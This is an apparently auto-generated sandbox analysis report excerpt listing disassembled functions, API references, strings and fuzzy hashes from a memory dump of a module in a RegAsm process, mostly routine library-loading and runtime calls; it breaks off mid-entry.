Opcode ID: 1e67637b0c2be75403e9a5f85a37e9f57834ed72b9d50371aec6b9fda4ed0b42
Instruction ID: cfca2f213c679abf5a45a8fe0fdf40e7d18d488c1bae37c8f7dc68c754c6f6f9
Opcode Fuzzy Hash: 1e67637b0c2be75403e9a5f85a37e9f57834ed72b9d50371aec6b9fda4ed0b42
Instruction Fuzzy Hash: 12218078B021099FDF049F64D95CAEEB7B5AF85208F244434EA0A97741DB31AA49C7E1

Function 6C7A74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C7A7526
__Init_thread_footer.LIBCMT ref: 6C7A7566
__Init_thread_footer.LIBCMT ref: 6C7A7597

Strings

kernel32.dll, xrefs: 6C7A7557
UnmapViewOfFile2, xrefs: 6C7A7552

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 99b0cd73042fba093567b1852f8cd75a8ad402912d4386f8c93d020192f3bf0e
Instruction ID: 62be979992014af70eeb45872ae89989e521c78dad49e78919a82d0ec51a0f24
Opcode Fuzzy Hash: 99b0cd73042fba093567b1852f8cd75a8ad402912d4386f8c93d020192f3bf0e
Instruction Fuzzy Hash: F721F231B01502EFDF148BF8CE18E993375EB46335F444638E81597F40D720BA278AA6

Function 6C7A7930 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C75BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C7A7A3F), ref: 6C75BF11
Part of subcall function 6C75BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C7A7A3F), ref: 6C75BF5D
Part of subcall function 6C75BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C7A7A3F), ref: 6C75BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C7A7968
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C7AA264,6C7AA264), ref: 6C7A799A

Part of subcall function 6C759830: free.MOZGLUE(?,?,?,6C7A7ABE), ref: 6C75985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C7A79E0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C7A79E8

Strings

{l, xrefs: 6C7A79D0

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID: {l
API String ID: 3421697164-481446490
Opcode ID: d058ff66d893359ede4b5f96083dedf18504fd97ae4686f7a5f2679d493b38a4
Instruction ID: 56b8b2a7e7577f5feaaacc3de7d52f7dd3584714eceba5e4f637456289021ef0
Opcode Fuzzy Hash: d058ff66d893359ede4b5f96083dedf18504fd97ae4686f7a5f2679d493b38a4
Instruction Fuzzy Hash: 70213A757043049FCB14DF18D989A9EBBF5FF89314F44886DE84A9B361DB30A909CB92

Function 6C7A7A10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C75BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C7A7A3F), ref: 6C75BF11
Part of subcall function 6C75BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C7A7A3F), ref: 6C75BF5D
Part of subcall function 6C75BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C7A7A3F), ref: 6C75BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6C7A7A48
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6C7A7A7A

Part of subcall function 6C759830: free.MOZGLUE(?,?,?,6C7A7ABE), ref: 6C75985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C7A7AC0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C7A7AC8

Strings

{l, xrefs: 6C7A7AB0

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID: {l
API String ID: 3421697164-481446490
Opcode ID: 2976231d368b09ffc0eb24382ebf862c52a6b98c966db51e4b892c2b86b862fe
Instruction ID: fab0b4856513e442ed4cbfa4845c898d9203166e3c5f3c3f32359f5dc5e45eb5
Opcode Fuzzy Hash: 2976231d368b09ffc0eb24382ebf862c52a6b98c966db51e4b892c2b86b862fe
Instruction Fuzzy Hash: D9213C756043089FCB14DF18D989A9EBBA5FF89314F44886DE84A97351DB30A909CBD2

Function 6C7AAB90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SearchPathW.KERNEL32(?,6C76BFBD,.dll,00000000,00000000,00000000,6C76BFBD), ref: 6C7AABBD
moz_xmalloc.MOZGLUE(00000001), ref: 6C7AABD8

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C7AABEB
SearchPathW.KERNEL32(?,?,.dll,00000001,?,00000000), ref: 6C7AAC03

Strings

.dll, xrefs: 6C7AABB4, 6C7AABFA

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: PathSearch$mallocmemsetmoz_xmalloc
String ID: .dll
API String ID: 3063185715-2738580789
Opcode ID: b9b5453e3fb4b6644f287659b756b61aab4380c1b45adc1719107606b45203cd
Instruction ID: aa8245d37e6b3e27d5684425a6c4ae7d606d3ff0c90600fff02fb8300611ceeb
Opcode Fuzzy Hash: b9b5453e3fb4b6644f287659b756b61aab4380c1b45adc1719107606b45203cd
Instruction Fuzzy Hash: AB01D2B2A0010A7FEB015EB48C48ABFB6ADEB85350F054035FC04E3600E7759D548BA2

Function 6C7AA7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C7CF770,-00000001,?,6C7BE330,?,6C76BDF7), ref: 6C7AA7AF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C76BDF7), ref: 6C7AA7C2
moz_xmalloc.MOZGLUE(00000018,?,6C76BDF7), ref: 6C7AA7E4
LeaveCriticalSection.KERNEL32(6C7CF770), ref: 6C7AA80A

Strings

accelerator.dll, xrefs: 6C7AA7BF

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
String ID: accelerator.dll
API String ID: 2442272132-2426294810
Opcode ID: 748319203395f3acfa4ba6735525c035e9f28b0890527b351527343ad70af160
Instruction ID: 12d3e0acf217c3366c1a842a20bef9df1dfa60ae5a4dd635794e3807731e0061
Opcode Fuzzy Hash: 748319203395f3acfa4ba6735525c035e9f28b0890527b351527343ad70af160
Instruction Fuzzy Hash: 9201A2707003059FDB04CFA5D988D1277B8FF89725744807AE8098B701DB70AD10CFA1

Function 6C74F0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,6C74EE51,?), ref: 6C74F0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C74F0C2

Strings

Could not find CoTaskMemFree, xrefs: 6C74F0E3
Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C74F0DC
ole32, xrefs: 6C74F0AD

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: b0e2ad3db85e99ebef12f9fcdae909efae99782ca278fe74417086bea7e46817
Instruction ID: c1ecbeb084b9ba2b3904fd34daf23b595a6c3309819dad7955e4b5c12b16e1ce
Opcode Fuzzy Hash: b0e2ad3db85e99ebef12f9fcdae909efae99782ca278fe74417086bea7e46817
Instruction Fuzzy Hash: D0E0D8743442079F9F141A625A0CA2637BC6B5670A700C139F411D1E10EA20E600C656

Function 6C7A73E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32.dll,?,?,6C75434E), ref: 6C7A73EB
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwarenessContext), ref: 6C7A7404
FreeLibrary.KERNEL32(?,?,6C75434E), ref: 6C7A7413

Strings

user32.dll, xrefs: 6C7A73E6
SetProcessDpiAwarenessContext, xrefs: 6C7A73FE

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SetProcessDpiAwarenessContext$user32.dll
API String ID: 145871493-397433131
Opcode ID: eee1d5ed01c66fc2543c61cdf63134951d29337d562286a6686e5013a1591fb3
Instruction ID: b09b6d6674da762007593195b964571d08040b1aa61ed4f297cf87514c6882df
Opcode Fuzzy Hash: eee1d5ed01c66fc2543c61cdf63134951d29337d562286a6686e5013a1591fb3
Instruction Fuzzy Hash: F4E04F742017029FE7101FA5CA18702BAFCEB06B45F108939FA95D3704E7B1E5008B90

Function 6C7800D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C757235), ref: 6C7800D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C7800F7
FreeLibrary.KERNEL32(?,6C757235), ref: 6C78010E

Strings

CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C7800F1
wintrust.dll, xrefs: 6C7800D3

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: 9b5f9d8137c231eebd49dbaa3595bb451a1044f7e2a89a49df3f07a2580edbb0
Instruction ID: 3be3d8ad69d1bab02c9ed664bf5e9277ba9e52ff7eb56e733b8befa78840fa0d
Opcode Fuzzy Hash: 9b5f9d8137c231eebd49dbaa3595bb451a1044f7e2a89a49df3f07a2580edbb0
Instruction Fuzzy Hash: 18E0B674B463479FEF009F66CA8A7257AFDB707795F604035EA4A82A50DBB0E340CB11

Function 6C780080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C757204), ref: 6C780088
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C7800A7
FreeLibrary.KERNEL32(?,6C757204), ref: 6C7800BE

Strings

wintrust.dll, xrefs: 6C780083
CryptCATAdminAcquireContext2, xrefs: 6C7800A1

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext2$wintrust.dll
API String ID: 145871493-3385133079
Opcode ID: 4f4148b395a30bbc8d3b3d45432e34d1baf0260a16749c2bc09084b90cf8d702
Instruction ID: 2f53d35e5776c268ca649183f17fef69f4e977ac1ee3b0a679aa8a9e13422c74
Opcode Fuzzy Hash: 4f4148b395a30bbc8d3b3d45432e34d1baf0260a16749c2bc09084b90cf8d702
Instruction Fuzzy Hash: 99E092746423479FEF00AF668A587117AFCAB0B745F104036BA15C2650DBB4D2449B56

Function 6C780170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C757308), ref: 6C780178
GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C780197
FreeLibrary.KERNEL32(?,6C757308), ref: 6C7801AE

Strings

CryptCATCatalogInfoFromContext, xrefs: 6C780191
wintrust.dll, xrefs: 6C780173

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATCatalogInfoFromContext$wintrust.dll
API String ID: 145871493-3354427110
Opcode ID: 208986c771b7f909dce51d86f9d9db4afc5d04e3bb84c34f51a22e982f38f3c6
Instruction ID: 56bbb28d10d14b47c980094e21cde627782ceddbae09568b3a5a0fe15b52f0ed
Opcode Fuzzy Hash: 208986c771b7f909dce51d86f9d9db4afc5d04e3bb84c34f51a22e982f38f3c6
Instruction Fuzzy Hash: 55E0BF74A823079FEF405F67CA48B157BFCB707795F500076EA8582750D7749650CB15

Function 6C780120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C757297), ref: 6C780128
GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C780147
FreeLibrary.KERNEL32(?,6C757297), ref: 6C78015E

Strings

wintrust.dll, xrefs: 6C780123
CryptCATAdminEnumCatalogFromHash, xrefs: 6C780141

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
API String ID: 145871493-1536241729
Opcode ID: cf515c07f0e143958a0a21247ced6240acd693530d1e45f577db49ab8f175613
Instruction ID: 3a4a53a47f260d4070731019c31f49e3f07b9e5aff64a7b076c5075ac890d4e5
Opcode Fuzzy Hash: cf515c07f0e143958a0a21247ced6240acd693530d1e45f577db49ab8f175613
Instruction Fuzzy Hash: 05E09274A472879FEF006F6ADA4871A7AFCA707B95F104135AA16C6750DBB0D2008B59

Function 6C7801C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C757266), ref: 6C7801C8
GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6C7801E7
FreeLibrary.KERNEL32(?,6C757266), ref: 6C7801FE

Strings

wintrust.dll, xrefs: 6C7801C3
CryptCATAdminReleaseContext, xrefs: 6C7801E1

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminReleaseContext$wintrust.dll
API String ID: 145871493-1489773717
Opcode ID: 69ffbe4963eb15829898c61a64f5114701847eb1b2ee0d90ecde6682c01de5a3
Instruction ID: 308cec3cc2cf1f62a96ddfe6254ec29200326698b2bc96c6441256f65bca0d19
Opcode Fuzzy Hash: 69ffbe4963eb15829898c61a64f5114701847eb1b2ee0d90ecde6682c01de5a3
Instruction Fuzzy Hash: 72E09A786823879FEF006F6689487167AFCAB07795F104436EB05C1650DB7492009B11

Function 6C7AC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C7AC0E9), ref: 6C7AC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C7AC437
FreeLibrary.KERNEL32(?,6C7AC0E9), ref: 6C7AC44C

Strings

ntdll.dll, xrefs: 6C7AC413
NtQueryVirtualMemory, xrefs: 6C7AC431

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: c8dc79fda80a6251e35b4960adacbff02662bf3c5195d7983209aa40fc2897ee
Instruction ID: 8e2c65bda336a0994c684772927a32948f4bf1b3c9775218f380f0c3cb1912a7
Opcode Fuzzy Hash: c8dc79fda80a6251e35b4960adacbff02662bf3c5195d7983209aa40fc2897ee
Instruction Fuzzy Hash: 89E0927460530BAFDB006F728A487117EFCA70AA05F004236BA0492600EBB1D6418A54

Function 6C7A75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C7A748B,?), ref: 6C7A75B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C7A75D7
FreeLibrary.KERNEL32(?,6C7A748B,?), ref: 6C7A75EC

Strings

ntdll.dll, xrefs: 6C7A75B3
RtlNtStatusToDosError, xrefs: 6C7A75D1

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 5853c57bb67d1a1f1cfaf887c971190999bd04ccf51689ec9b7c53eb0ff8c7ff
Instruction ID: ce2e7b480e70b401d30fd5feda64bfa9b76e031141b52bc6c9a2ab93ea355c7c
Opcode Fuzzy Hash: 5853c57bb67d1a1f1cfaf887c971190999bd04ccf51689ec9b7c53eb0ff8c7ff
Instruction Fuzzy Hash: 8EE092B2640307AFEB006BB2C9487057AFCEB07758F504135A905D2600EBB0D26A8F51

Function 6C7A7600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C7A7592), ref: 6C7A7608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C7A7627
FreeLibrary.KERNEL32(?,6C7A7592), ref: 6C7A763C

Strings

NtUnmapViewOfSection, xrefs: 6C7A7621
ntdll.dll, xrefs: 6C7A7603

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: 40511d235c79c533b4b9dcb9c8d901c1f107879d3d9489f795617b999579b85b
Instruction ID: 02482091cc0abc2967dac411a427efa8a62719dbe75896bedc331d41320baf33
Opcode Fuzzy Hash: 40511d235c79c533b4b9dcb9c8d901c1f107879d3d9489f795617b999579b85b
Instruction Fuzzy Hash: D9E092B1600707AFDF006FB68E087017ABCE71A759F404239E905D2610E7B092258B59

Function 6C7AC1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C7AC1DE,?,00000000,?,00000000,?,6C75779F), ref: 6C7AC1F8
GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6C7AC217
FreeLibrary.KERNEL32(?,6C7AC1DE,?,00000000,?,00000000,?,6C75779F), ref: 6C7AC22C

Strings

wintrust.dll, xrefs: 6C7AC1F3
WinVerifyTrust, xrefs: 6C7AC211

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WinVerifyTrust$wintrust.dll
API String ID: 145871493-2991032369
Opcode ID: 265985ed9a491adc248fb14340416bb721714908903142b1e1409626a3a348c2
Instruction ID: 0e6b3202202cd8050f9bb1d509b8b98b8f55e338f8dd6c9256794d2ca820cee9
Opcode Fuzzy Hash: 265985ed9a491adc248fb14340416bb721714908903142b1e1409626a3a348c2
Instruction Fuzzy Hash: B8E0B678201347AFDF007FA2CA487027EFCAB46705F004636AA05D2741E7B192009B55

Function 6C7AC240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

